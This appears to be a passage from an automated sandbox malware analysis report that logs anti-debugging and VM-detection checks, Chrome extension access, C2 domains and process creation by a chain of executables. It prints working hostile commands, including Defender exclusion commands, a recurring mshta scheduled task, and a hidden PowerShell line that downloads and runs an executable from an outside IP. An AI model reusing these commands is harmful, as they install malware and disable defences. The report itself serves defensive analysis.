                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97531
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97422
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97312
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97203
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97093
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96978
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96841
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96729
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96620
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 96487
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                      Source: skotes.exe, skotes.exe, 00000007.00000002.2049287825.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, GIIIIJDHJE.exe, 0000000D.00000002.2287860490.000000000097C000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000002.2330367561.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, iSHmPkn.exe, 00000010.00000002.2504764685.0000000000874000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
                                      Source: GIIIIJDHJE.exe, 0000000D.00000002.2290971116.00000000010D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareU
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F53000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                      Source: mshta.exe, 00000026.00000002.2634457581.00000282BDA1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273928950.0000000000B08000.00000040.00000001.01000000.00000006.sdmp, 31FYMQUCQX14ZVCZU2HAYNV7V.exe, 00000005.00000002.2006226449.000000000067C000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2049537334.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2049287825.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, GIIIIJDHJE.exe, 0000000D.00000002.2287860490.000000000097C000.00000040.00000001.01000000.0000000F.sdmp, skotes.exe, 0000000E.00000002.2330367561.000000000119C000.00000040.00000001.01000000.0000000A.sdmp, iSHmPkn.exe, 00000010.00000002.2504764685.0000000000874000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                      Source: iSHmPkn.exe, 00000010.00000002.2512245788.000000000B7C5000.00000004.00000020.00020000.00000000.sdmp, eXbhgU9.exe, 00000011.00000002.2746906922.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                      Source: eXbhgU9.exe, 00000011.00000002.2795889667.0000000006800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSystem information queried: ModuleInformationJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Documents\GIIIIJDHJE.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\YQNZByFp\jyidkjkfhjawd.exe	Thread information set: HideFromDebugger
Source: C:\YQNZByFp\jyidkjkfhjawd.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: SIWVID
Source: C:\Users\user\Desktop\5EfYBe3nch.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\5EfYBe3nch.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\5EfYBe3nch.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\GIIIIJDHJE.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\GIIIIJDHJE.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\GIIIIJDHJE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Code function: 5_2_04DA0B97 rdtsc 5_2_04DA0B97
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Code function: 2_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C53AC62
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Code function: 5_2_004B652B mov eax, dword ptr fs:[00000030h] 5_2_004B652B
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Code function: 5_2_004BA302 mov eax, dword ptr fs:[00000030h] 5_2_004BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00FD652B mov eax, dword ptr fs:[00000030h] 6_2_00FD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00FDA302 mov eax, dword ptr fs:[00000030h] 6_2_00FDA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FD652B mov eax, dword ptr fs:[00000030h] 7_2_00FD652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FDA302 mov eax, dword ptr fs:[00000030h] 7_2_00FDA302
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Code function: 2_2_6C53AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C53AC62
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match	File source: amsi32_1228.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_1696.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_980.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7768.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
Source: 10DCQZI[1].exe.15.dr, Program.cs	Reference to suspicious API methods: SABPDelegates.SABP(GetModuleHandle, GetProcAddress, VirtualProtect)
Source: 10DCQZI[1].exe.15.dr, Program.cs	Reference to suspicious API methods: SABPDelegates.SABP(GetModuleHandle, GetProcAddress, VirtualProtect)
Source: 10DCQZI[1].exe.15.dr, Options.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, (uint)array.Length, 12288u, 64u)
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: 5EfYBe3nch.exe, 00000000.00000003.1703880304.0000000005130000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fancywaxxers.shop
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\GIIIIJDHJE.exe "C:\Users\user\Documents\GIIIIJDHJE.exe"
Source: C:\Users\user\Documents\GIIIIJDHJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Process created: C:\YQNZByFp\jyidkjkfhjawd.exe "C:\YQNZByFp\jyidkjkfhjawd.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
